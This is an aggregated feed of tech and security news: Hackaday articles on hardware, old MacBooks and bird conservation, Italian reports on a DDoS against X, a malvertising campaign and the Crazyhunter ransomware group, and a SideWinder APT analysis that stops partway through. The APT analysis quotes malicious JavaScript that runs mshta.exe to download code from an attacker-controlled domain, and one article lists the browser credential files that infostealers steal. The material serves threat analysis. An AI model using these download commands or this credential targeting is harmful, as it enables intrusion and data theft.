By dropping all of the unnecessary features, the device doesn’t need to waste energy with things like WiFi or Bluetooth and can get around 880 pages on a single charge, not counting any extra energy coming in through the solar panel while it’s operating. The LICs will also theoretically improve its life cycle as well. If you’re still stuck with a paperweight when you formerly had a working e-reader, though, there are plenty of ways to bring old devices back to life as well.

hackaday.com/2025/03/10/solar-…

There have been several attempts to make an unencumbered version of Windows. ReactOS is perhaps the best-known, although you could argue Wine and its progeny, while not operating systems in the strictest sense of the word, might be the most successful. Joining the fray is Free95, a GPL-3.0 system that, currently, can run simple Windows programs. The developer promises to push to even higher compatibility.

As you might expect, the GitHub site is calling for contributors. There will be a lot to do. The src subdirectory has a number of files, but when you consider the sheer volume of stuff crammed into Windows, it is just a minimal start.

As for the “Does it run Doom?” test, we are pretty sure the answer is no, not yet. While we applaud the effort, we do think it is a long road to get from where the project is to where even ReactOS is, much less Windows itself. Besides, Windows is a rapidly moving target.

As virtualization becomes easier and faster, the need for these programs diminishes. You can easily run a Windows OS inside your host operating system. If it outperforms the original on period hardware, maybe that’s good enough. On the other hand, if you are trying to run old hardware, maybe something like this will let you get a few more years out of it, one day.

We’ve looked at ReactOS before. If you are just looking to reduce bloat, there are other ways to go.

hackaday.com/2025/03/10/freein…

X, la piattaforma di social media precedentemente nota come Twitter, nella giornata di oggi è rimasta offline per diverso tempo. Secondo Downdetector.com, X ha riscontrato per la prima volta problemi diffusi intorno alle 5:40 ET di lunedì.

Alcuni utenti hanno affermato di non essere riusciti a caricare i post di X o di aver ricevuto messaggi di errore come “Qualcosa è andato storto. Prova a ricaricare”.

X ha poi ripreso il servizio nella tarda mattinata di oggi, ma è sembrato che abbia subito nuovamente delle interruzioni intorno alle 10:00 ET, raggiungendo il picco con 40.000 segnalazioni di problemi, e alle 13:00 ET e poi alle 19 ora locale italiana.

Le interruzioni sono state segnalate a livello globale.

Le rivendicazione di Dark Storm Team

Nel mentre il gruppo Dark Storm Team ha rivendicato la responsabilità di un attacco DDoS su X. Gli hacker si sono formati come collettivo filo-palestinese nel 2023 e avrebbero preso di mira i siti web governativi dei paesi della NATO, di Israele e delle nazioni che sostengono Israele.

Come sanno i nostri lettori, un attacco DDoS (distributed denial-of-service) include volumi di traffico sospetti o picchi di traffico che causano il rallentamento o l’indisponibilità di un sito Web o di un servizio. Inondare un bersaglio con connessioni malformate può renderlo inaccessibile agli utenti legittimi.

Nel post su Telegram acquisito da Red Hot Cyber, il collettivo rivendica la responsabilità dell’attacco DDoS su X di oggi. Dark Storm Team ha scritto di essere riuscito a “mettere offline Twitter” e ha condiviso uno screenshot di una pagina sullo stato della connettività in tempo reale che mostrava tentativi di connessione falliti da più sedi in tutto il mondo.

Il gruppo di hacker Dark Storm Team (DST) sarebbe stato creato nel settembre 2023, poche settimane prima dell’attacco terroristico di Hamas del 7 ottobre contro Israele.

Si dice che il gruppo sia filo-palestinese e abbia possibili collegamenti con la Russia.

Le dichiarazioni di Elon Musk

“C’è stato (c’è ancora) un massiccio attacco informatico contro X”, ha scritto Musk lunedì pomeriggio. “Siamo attaccati ogni giorno, ma questo è stato fatto con molte risorse. È coinvolto un gruppo numeroso e coordinato e/o un paese. Tracciare…”

Musk è anche l’amministratore delegato di Tesla e SpaceX, oltre a guidare il DOGE (Dipartimento per l’efficienza governativa) del presidente Donald Trump.

L'articolo X va Offline per un Attacco DDoS di Dark Storm. Elon Musk: “Gruppo Mumeroso e Coordinato” proviene da il blog della sicurezza informatica.

Microsoft ha rivelato che negli ultimi mesi quasi 1 milione di dispositivi Windows sono stati colpiti da una sofisticata campagna di malvertising. Credenziali, criptovalute e informazioni riservate sono state rubate dai computer degli utenti infetti.

Secondo i ricercatori, la campagna è iniziata a dicembre 2024, quando degli aggressori sconosciuti hanno iniziato a distribuire link attraverso i quali venivano caricati annunci pubblicitari. Microsoft sostiene che i siti che ospitavano gli annunci pubblicitari erano piattaforme di streaming pirata che ospitavano contenuti illegali. Il rapporto dell’azienda cita due di questi domini: movies7[.]net e 0123movie[.]art.

“I siti di streaming installavano redirector dannosi per generare entrate dalle piattaforme di pagamento per visualizzazioni o clic”, scrivono gli esperti.
Schema dell’attacco
I link dannosi incorporati tramite iframe portavano le vittime attraverso una catena di reindirizzamenti, una serie di siti intermedi (come un sito di supporto tecnico truffaldino) e infine conducevano a repository GitHub che ospitavano una serie di file dannosi.

Il malware è stato distribuito in più fasi. Pertanto, nelle fasi iniziali, venivano raccolte informazioni sul dispositivo dell’utente, presumibilmente per configurare le fasi successive dell’attacco. Nelle fasi successive, le applicazioni di rilevamento del malware sono state disattivate ed è stata stabilita una connessione con i server di controllo, dopodiché il malware NetSupport è stato installato sul sistema.

“A seconda del payload della seconda fase, uno o più file eseguibili e talvolta uno script PowerShell codificato venivano recapitati al dispositivo infetto”, hanno scritto i ricercatori. “Questi file hanno innescato una catena di eventi che includeva l’esecuzione di comandi, la consegna di payload, l’elusione delle difese, il raggiungimento della persistenza, la comunicazione con i server di comando e controllo e il furto di dati”.

Per ospitare il payload è stato utilizzato principalmente GitHub, ma sono stati utilizzati anche Discord e Dropbox. Gli esperti ritengono che la campagna sia stata opportunistica, nel senso che gli aggressori hanno preso di mira tutti senza prendere di mira persone, organizzazioni o settori specifici.

Il malware che penetrava nei sistemi delle vittime (solitamente l’infostealer Lumma e Doenerium) rubava i seguenti dati dai browser, dove potevano essere archiviati cookie di accesso, password, cronologie e altre informazioni sensibili.

• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\formhistory.sqlite;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\key4.db;
• \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\logins.json;
• \AppData\Local\Google\Chrome\Dati utente\Default\Dati Web;
• \AppData\Local\Google\Chrome\Dati utente\Default\Dati di accesso;
• \AppData\Local\Microsoft\Edge\Dati utente\Default\Dati di accesso.

Gli aggressori erano interessati anche ai file archiviati nel servizio cloud Microsoft OneDrive e il malware verificava la presenza di portafogli di criptovaluta (Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey e BitBox) sul computer della vittima.

Secondo Microsoft, i payload della prima fase erano firmati digitalmente e l’azienda ha ora identificato e revocato 12 diversi certificati utilizzati in questi attacchi.

L'articolo Microsoft svela un attacco shock: 1 milione di PC infettati da malware nascosto negli ADS proviene da il blog della sicurezza informatica.

When it comes to what birds have and what humans don’t, your mind might first land on the ability to fly. However, birds are also pretty good at navigating from the air… assuming, that is, they know where they’re trying to go in the first place.

In recent decades, conservationists have been trying to reintroduce the northern bald ibis to central Europe. There’s just one problem—when the birds first died out on the continent, so did their handed-down knowledge of their traditional migration route. Somehow, the new generation had to be taught where to go.

Flightpaths

The northern bald ibis was once widely found all over Europe, but disappeared several centuries ago. It had the most success clinging on in Morocco, which has been a source of birds for reintroduction efforts. Credit: Len Worthington, CC BY-SA 2.0
The population of the northern bald ibis used to be spread farther and wider than it is today. Fossil records indicate the bird once lived in great numbers across northern Africa, the Middle East, and southern and central Europe. Sadly, it vanished from Europe sometime in the 17th century, though it persisted elsewhere, most notably in Morocco. A wild population hung on in Turkey, though faced a rapid decline from the 1970s onwards, with birds failing to return from their winter migrations. In 1992, a handful of remaining birds were kept caged for part of the year to prevent these annual losses. Meanwhile, in 2002, it was revealed that a handful of birds were clinging on with isolated nests found in Syria. Numbers remain limited in the low four-figure range, with the northern bald ibis definitively listed as endangered.

ED NOTE: Great pictures here but it’s not 100% clear if we can use them.waldrapp.eu/pictures/

With the bird’s status in danger, multiple reintroduction efforts have been pursued around the world. In particular, European efforts had boosted a conserved population up to 300 individuals by the early 2000s. However, keeping the birds alive proved challenging. Being unfamiliar with the continent, the birds would tend to fly off in random directions when their instinct kicked in to migrate for winter. Without knowing where they were going, few birds would make it to a suitably warm climate for the colder months, and many failed to return home in the summer.
The birds are kept in aviaries at times to ensure they are fit for migration and that they don’t head off in a random direction of their own accord. Credit: Baekemm, CC BY-SA 4.0
In 2002, an effort to solve this began in earnest. It hoped to not only return the birds to the wild, but to let them freely roam and migrate as they once did with abandon. The hope was to breed birds in captivity, and then train them on their traditional migration route, such that they might then pass the knowledge on to their descendants.

Of course, you can’t simply sit a northern bald ibis down with a map and show it how to get from northern Austria down to Tuscany and back. Nor can you train it on a flight simulator or give it a GPS. Instead, the conservationists figured they’d teach the birds the old fashioned way. They’d fly the route with a microlite aircraft, with the birds trained to follow along behind. Once they got the idea, the microlite would guide them on the longer migration route, and the hope was that they’d learn to repeat the journey themselves for the future.

The benefit of using ultralight air craft was simple. It allowed the birds to see their keepers and follow a familiar human in flight. In contrast, typical general aviation aircraft or larger planes wouldn’t be so familiar to the birds, and they wouldn’t be so eager to follow.

In 2003, the first migration attempt took place. The initial attempt faced challenges, with inclement weather forcing the birds to be transported much of the way by road. However, the following year found great success. The birds were guided south during the autumn, and returned the following spring. The project continued, with repeat successes over the years. Reports from 2010 were particularly buoyant. Across August and September that autumn, the journey saw 14 birds following the microlites for an average distance of 174 km a day, winding up in Tuscany in time for the winter.

youtube.com/embed/3kE83VIZZO0?…

The project continues in earnest to this day. “We have to teach them the migration route and that’s what we do using microlight planes,” project director Johannes Fritz told AP. Leading the Waldrappteam, he’s been working for decades to train the birds on what used to come naturally. “Human foster parents raise the chicks so they are imprinted on human foster parents, and then we train them to follow the foster parents which sit on the back seat of the microlight—and it works.” The training is taking, with the team recording multiple birds independently deciding to fly the correct migration route over the years.

The hope is that the flock will grow larger and eventually become self-sustaining. Ideally, the older birds that know the route will teach younger generations, just as they learned themselves from the microlite pilots in their youth. It’s a grand tradition, passed down from pilot to bird to bird, perhaps not quite as nature intended!

Featured image: “Migration 2023 Laura Pehnke” Copyright: Waldrappteam Conservation & Research

hackaday.com/2025/03/10/conser…

Recently there was a panicked scrambling after the announcement by [Tarlogic] of a ‘backdoor’ found in Espressif’s popular ESP32 MCUs. Specifically a backdoor on the Bluetooth side that would give a lot of control over the system to any attacker. As [Xeno Kovah] explains, much about these claims is exaggerated, and calling it a ‘backdoor’ is far beyond the scope of what was actually discovered.

To summarize the original findings, the researchers found a number of vendor-specific commands (VSCs) in the (publicly available) ESP32 ROM that can be sent via the host-controller interface (HCI) between the software and the Bluetooth PHY. They found that these VSCs could do things like writing and reading the firmware in the PHY, as well as send low-level packets.

The thing about VSCs is of course that these are a standard feature with Bluetooth controllers, with each manufacturer implementing a range of these for use with their own software SDK. These VSCs allow for updating firmware, report temperatures and features like debugging, and are generally documented (except for Broadcom).

Effectively, [Xeno] makes the point that VSCs are a standard feature in Bluetooth controllers, which – like most features – can also be abused. [Tarlogic] has since updated their article as well to distance themselves from the ‘backdoor’ term and instead want to call these VSCs a ‘hidden feature’. That said, if these VSCs in ESP32 chips are a security risk, then as [Xeno] duly notes, millions of BT controllers from Texas Instruments, Broadcom and others with similar VSCs would similarly be a security risk.

hackaday.com/2025/03/10/the-es…

Despite a general lack of real-world experience, many teenagers are overly confident in their opinions, often to the point of brashness and arrogance. In the late 90s and early 00s I was no different, firmly entrenched in a clichéd belief that Apple computers weren’t worth the silicon they were etched onto—even though I’d never actually used one. Eventually, thanks to a very good friend in college, a bit of Linux knowledge, and Apple’s switch to Intel processors, I finally abandoned this one irrational belief. Now, I maintain an array of Apple laptops for my own personal use that are not only surprisingly repairable and hacker-friendly but also serve as excellent, inexpensive Linux machines.

Of course, I will have ruffled a few feathers suggesting Apple laptops are repairable and inexpensive. This is certainly not true of their phones or their newer computers, but there was a time before 2016 when Apple built some impressively high quality, robust laptops that use standard parts, have removable batteries, and, thanks to Apple dropping support for these older machines in their latest operating systems, can also be found for sale for next to nothing. In a way that’s similar to buying a luxury car that’s only a few years old and letting someone else eat the bulk of the depreciation, a high quality laptop from this era is only one Linux install away from being a usable and relatively powerful machine at an excellent bargain.

The History Lesson

To be fair to my teenage self though, Apple used to use less-mainstream PowerPC processors which meant there was very little software cross-compatibility with x86 PCs. It was also an era before broadband meant that most people could move their work into cloud and the browser, allowing them to be more agnostic about their operating system. Using an Apple when I was a teenager was therefore a much different experience than it is today. My first Apple was from this PowerPC era though; my ThinkPad T43 broke mid-way through college and a friend of mine gave me an old PowerBook G4 that had stopped working for her. Rather than have no computer at all, I swallowed my pride and was able to get the laptop working well enough to finish college with it. Part of the reason this repair was even possible was thanks to a major hacker-friendly aspect of Apple computers: they run Unix. (Note for commenters: technically Apple’s OS is Unix-like but they have carried a UNIX certification since 2007.)

I had used Unix somewhat in Solaris-based labs in college but, as I mentioned in a piece about installing Gentoo on one of my MacBooks, I was also getting pretty deep into the Linux world at the time as well. Linux was also designed to be Unix-like, so most of the basic commands and tools available for it have nearly one-to-one analogs in Unix. The PowerBook’s main problem, along with a battery that needed a warranty replacement, was a corrupted filesystem and disk drive that I was able to repair using my new Linux knowledge. This realization marked a major turning point for me which helped tear down most of my biases against Apple computers.
MacBooks through the ages
Over the next few years or so I grew quite fond of the PowerBook, partially because I liked its 12″, netbook-like form factor and also because the operating system never seemed to crash. As a Linux user, my system crashes were mostly self-inflicted, but they did happen. As a former Windows user as well, the fact that it wouldn’t randomly bluescreen itself through no fault of my own was quite a revelation. Apple was a few years into their Intel years at this point as well, and seeing how easily these computers did things my PowerBook could never do, including running Windows, I saved up enough money to buy my first MacBook Pro, a mid-2009 model which I still use to this day. Since then I’ve acquired four other Apple laptops, most of which run Linux or a patched version of macOS that lets older, unsupported machines run modern versions of Apple’s operating system.

So if you’ve slogged through my coming-of-age story and are still curious about picking up an old Mac for whatever reason—a friend or family member has one gathering dust, you’re tired of looking at the bland styling of older ThinkPads while simultaneously growing frustrated with the declining quality of their newer ones, or just want to go against the grain a bit and do something different—I’ll try and help by sharing some tips and guidelines I’ve picked up through the years.

What to Avoid

Starting with broad categories of older Apple laptops to avoid, the first major red flag are any with the butterfly keyboard that Apple put on various laptops from 2015 to 2019 which were so bad that a number of lawsuits were filed against them. Apple eventually relented and instituted a replacement program for them, but it’s since expired and can cost hundreds of dollars to fix otherwise. The second red flag are models with the T2 security chips. It’s not a complete dealbreaker but does add a lot of hassle if the end goal is a working Linux machine.

Additionally, pay close attention to any laptops with discrete graphics cards. Some older MacBooks have Nvidia graphics, which is almost always going to provide a below-average experience for a Linux user especially for Apple laptops of this vintage. Others have AMD graphics which do have better Linux support, but there were severe problems with the 15″ and 17″ Mac around the 2011 models. Discrete graphics is not something to avoid completely like laptops with butterfly keyboards, but it’s worth investigating the specific model year for problems if a graphics card is included. A final note is to be aware of “Staingate” which is a problem which impacted some Retina displays between 2012 and 2015. This of course is not an exhaustive list, but covers the major difficult-to-solve problems for this era of Apple laptop.

What to Look For

As for what specific computers are the best from this era for a bit of refurbishment and use, in my opinion the best mix of performance, hackability, and Linux-ability will be from the 2009-2012 Unibody era. These machines come in all sizes and are surprisingly upgradable, with standard SODIMM slots for RAM, 2.5″ laptop drives, an optical drive (which can be changed out for a second hard drive), easily replaceable batteries if you can unscrew the back cover, and plenty of ports. Some older models from this era have Core 2 Duo processors and should be avoided if you have the choice, but there are plenty of others from this era with much more powerful Core i5 or Core i7 processors.

After 2012, though, Apple started making some less-desirable changes for those looking to maintain their computers long-term, like switching to a proprietary M.2-like port for their storage and adding in soldered or otherwise non-upgradable RAM, but these machines can still be worthwhile as many had Core i7 processors and at least 8 GB of RAM and can still run Linux and even modern macOS versions quite capably. The batteries can still be replaced without too much hassle as well.
Inside the 2012 MacBook Pro. Visible here are the 2.5″ SSD, removable battery, standard SODIMM RAM slots, optical drive, and cooling fan.
Of course, a major problem with these computers is that they all have processors that have the Intel Management Engine coprocessor installed, so they’re not the most privacy-oriented machines in existence even if Linux is the chosen operating system. It’s worth noting, though, that some MacBooks from before the unibody era can run the open-source bootloader Libreboot but the tradeoff, as with any system capable of running Libreboot, is that they’re a bit limited in performance even compared to the computers from just a few years later.

Out of the five laptops I own, four are from the pre-butterfly era including my two favorites. Topping the list is a mid-2012 13″ MacBook Pro with Intel graphics that’s a beast of a Debian machine thanks to upgrades to a solid state drive and to 16 GB of RAM. It also has one of the best-feeling laptop keyboards I’ve ever used to write with, and is also the computer I used to experiment with Gentoo.

Second place goes to a 2015 11″ MacBook Air which is a netbook-style Apple that I like for its exceptional portability even though it’s not as upgradable as I might otherwise like. It will have 4 GB of RAM forever, but this is not much of a problem for Debian. I also still have my 2009 MacBook Pro as well, which runs macOS Sonoma thanks to OpenCore Legacy Patcher. This computer’s major weakness is that it has an Nvidia graphics card so it isn’t as good of a Linux machine as the others, and occasionally locks up when running Debian for this reason. But it also has been upgraded with an SSD and 8 GB of RAM so Sonoma still runs pretty well on it despite its age. Sequoia, on the other hand, dropped support for dual-core machines so I’m not sure what I will do with it after Sonoma is no longer supported.
A 13″ MacBook Air from 2013. Not quite as upgradable as the 2012 MacBook Pro but still has a removable battery and a heat sink which can be re-pasted much more easily.
My newest Apple laptop is an M1 MacBook Air, which I was excited about when it launched because I’m a huge fan of ARM-based personal computers for more reasons than one. Although the M1 does have essentially no user-repairability unless you want to go to extremes, I have some hope that this will last me as long as my MacBook Pros have thanks to a complete lack of moving parts and also because of Asahi Linux, a version of Fedora which is built for Apple silicon. Whenever Apple stops providing security patches for this machine, I plan to switch it over to this specialized Linux distribution.

Why Bother?

But why spend all this effort keeping these old machines running at all? If repairability is a major concern, laptops from companies like System76 or Framework are arguably a much better option. Not to mention that, at least according to the best Internet commenters out there, Apple computers aren’t supposed to be fixable, repairable, or upgradable at all. They’re supposed to slowly die as upgrades force them to be less useful.

While this is certainly true for their phones and their more modern machines to some extent, part of the reason I keep these older machines running is to go against the grain and do something different, like a classic car enthusiast who picks a 70s era Volkswagen to drive to and from the office every day instead of a modern Lexus. It’s also because at times I still feel a bit like that teenager I was. While I might be a little wiser now from some life experiences, I believe some amount of teenage rebellion can be put to use stubbornly refusing to buy the latest products year after year from a trillion-dollar company which has become synonymous with planned obsolescence. Take that, Apple!

hackaday.com/2025/03/10/inexpe…

Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: Crazyhunter.

Con un’identità distinta e un manifesto che lo pone in contrasto con altri attori della scena cybercriminale, Crazyhunter si presenta come un’operazione sofisticata che punta sulla velocità di attacco, la distruzione dei dati e un sistema di branding criminale altamente strutturato.

Dalle informazioni raccolte sul loro Data Leak Site (DLS), disponibile nella rete Tor, il gruppo sembra adottare un approccio metodico e aggressivo, mirato a compromettere la sicurezza aziendale nel minor tempo possibile.

Con un sistema di negoziazione e gestione del riscatto che include strumenti di “dimostrazione” delle loro capacità distruttive, Crazyhunter si distingue per un modello di business che enfatizza la crittografia avanzata e persino l’uso della blockchain per registrare le loro “promesse” di decrittazione.

Struttura del DLS di Crazyhunter

Il portale Tor di Crazyhunter si articola in più sezioni, con un design minimale ma funzionale.

L’homepage Presenta il nome del gruppo e il motto: “There is no absolute safety”. Un’affermazione che riflette la loro filosofia, secondo cui nessun sistema è immune a un attacco ben strutturato.

Victim List

L’elenco delle vittime pubblicate mostra aziende ed enti, prevalentemente in Taiwan, tra cui ospedali e università. Ogni scheda riporta:

• Importo del riscatto richiesto (fino a $1.500.000).
• Stato della trattativa, con alcune voci contrassegnate come Expired (probabilmente significa che i dati verranno rilasciati) e altre con la dicitura Successful cooperation (indicando un pagamento effettuato).
• Timer per la scadenza dell’accordo, suggerendo un meccanismo di pressione psicologica sulle vittime.

About Us Qui il gruppo descrive il proprio modus operandi e i punti di forza del ransomware.

Contact Us Pagina con un form di contatto, utilizzata per le negoziazioni o possibili collaborazioni.

Tecniche e Tattiche di Attacco

Dalle informazioni fornite nel manifesto strategico, Crazyhunter si propone come un’operazione altamente tecnica, con una serie di caratteristiche distintive che lo rendono particolarmente pericoloso:

Approccio ultra-rapido: il “72-hour Vulnerability Response Vacuum”

Crazyhunter sostiene di bucare la sicurezza delle vittime in meno di 72 ore, grazie a:

• Exploit esclusivi, con un tempo di rilevamento superiore del 300% rispetto alle medie stimate dal MITRE.
• Bypass avanzato dei più noti sistemi di protezione degli endpoint, tra cui CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR, Trend Micro XDR.

Questo indica che il gruppo sfrutta vulnerabilità zero-day o N-day ben mirate, oltre a tattiche di evasion avanzate, che potrebbero includere l’uso di malware polimorfico e tecniche di attacco senza file (fileless attacks).

Il “Three-dimensional Data Annihilation System”

Crazyhunter non si limita a cifrare i dati, ma introduce un concetto di “annientamento” su tre livelli:

• Encryption Layer → Utilizza l’algoritmo XChaCha20-Poly1305, noto per la sua sicurezza e velocità, rendendo impossibile il recupero dei dati senza la chiave corretta.
• Destruction Layer → Impiega una tecnologia di cancellazione approvata dalla CIA, probabilmente riferendosi a standard come DoD 5220.22-M o metodi di sovrascrittura multipla per rendere i dati irrecuperabili.
• Deterrence Layer → Qui emerge un aspetto nuovo nel panorama ransomware: il gruppo afferma di generare prove compromettenti altamente realistiche contro i dirigenti delle aziende attaccate, mediante AI e deepfake, per esercitare una pressione aggiuntiva nelle negoziazioni.

Questo mix di crittografia avanzata, distruzione totale dei dati e minacce reputazionali rende Crazyhunter un attore unico nel suo genere, combinando ransomware tradizionale con metodi di coercizione psicologica.

Criminal Branding e Blockchain

Crazyhunter si distingue anche per un concetto inedito nel mondo del ransomware: il branding criminale. Tra i servizi offerti ci sono:

• Possibilità di ritardare la pubblicazione dei dati pagando il 50% del riscatto in anticipo.
• Una guida alla remediation delle vulnerabilità utilizzate per l’attacco, apparentemente come incentivo al pagamento.
• Un video di prova della cancellazione dei dati una volta pagato il riscatto.

Infine, il manifesto strategico sottolinea che il gruppo non si considera “avido” come REvil o “troppo rumoroso” come LockBit, e dichiara di fare solo tre cose:

1. Dimostrare l’inevitabilità dell’attacco attraverso la matematica.
2. Assicurare l’irreversibilità della minaccia tramite il codice.
3. Registrare ogni promessa mantenuta sulla blockchain.

L’ultimo punto suggerisce che Crazyhunter potrebbe utilizzare una blockchain pubblica o privata per tenere traccia delle operazioni completate, forse per dimostrare alle future vittime che mantengono la parola quando si tratta di fornire i decryptor dopo il pagamento.

Obiettivi e Vittime

L’analisi della victim list sul DLS di Crazyhunter mostra che il gruppo si è concentrato prevalentemente su organizzazioni taiwanesi, con un focus su:

• Università e istituti di ricerca (Asia University, Asia University Hospital).
• Strutture sanitarie (Mackay Hospital, Changhua Christian Medical Foundation).
• Aziende del settore energetico (Huacheng Electric).

L’inclusione di ospedali e istituzioni accademiche suggerisce un target opportunistico, dove la probabilità di pagamento è elevata a causa della sensibilità dei dati coinvolti. Tuttavia, è possibile che il gruppo espanda il proprio raggio d’azione verso aziende di altri settori nei prossimi mesi.

Conclusioni

Crazyhunter non è il solito gruppo ransomware. A differenza di altre operazioni che si concentrano solo sulla cifratura dei file, questo gruppo introduce tattiche di pressione aggiuntive, tra cui:

• Distruzione irreversibile dei dati, oltre alla cifratura.
• Uso di AI per creare prove compromettenti contro i dirigenti.
• Registrazione delle operazioni sulla blockchain per costruire “fiducia” nel mercato criminale.

Sebbene sia ancora presto per valutarne l’impatto complessivo, Crazyhunter ha già dimostrato di poter colpire organizzazioni di alto profilo e di avere un modello operativo altamente strategico. La combinazione di exploit avanzati, crittografia sofisticata e tattiche di coercizione lo rende una minaccia emergente da non sottovalutare.

Per le aziende, la lezione è chiara: non basta proteggersi dal ransomware tradizionale. Le nuove generazioni di cybercriminali stanno affinando strategie sempre più distruttive e difficili da contrastare.

L'articolo Crazyhunter: il nuovo ransomware con il “Sistema di Annientamento Dati Tridimensionale” proviene da il blog della sicurezza informatica.

Science fiction authors and readers dream of travelling at the speed of light, but Einstien tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphic argument for relativity that you can see in the video below.

The argument starts off by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing in the hidden height dimension at the exact same speed.

Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.

Now suppose the object turns a bit and is moving at, say, a 45 degree angle relative to the table top. Now the shadow moves and the “clock speed” measuring the height starts moving more slowly. If the object moves totally parallel to the surface, the shadow moves at the fixed speed and the clock speed shadow doesn’t move at all.

This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t necessarily a rule. It is simply that everything in the observable universe is moving at the speed of light and how moving through space affects it.

Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.

youtube.com/embed/TJmgKdc7H34?…

hackaday.com/2025/03/10/you-ar…

Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.

In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.

Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.

Infection vectors

The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate.

Some documents concerned nuclear power plants and nuclear energy agencies.

Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructures and various port authorities.

Malicious documents relating to maritime infrastructures and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.

We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Examples of generic malicious documents

RTF exploit

The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the
mshtml.RunHTMLApplication function.
In the new version, the embedded JavaScript runs the Windows utility
mshta.exe and obtains additional code from a remote server:javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.

• It uses the GlobalMemoryStatusEx function to determine the size of RAM.
• It attempts to load the nlssorting.dll library and terminates execution if operation succeeds.

JavaScript loader

The RTF exploit led to the execution of the
mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker.mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui
The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.

The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

The second stage is another JavaScript file. It enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable
COMPLUS_Version.
Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Downloader Module

This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the
app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions.
In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.

Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader

The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:
propsys.dll
vsstrace.dll
During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:
JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll
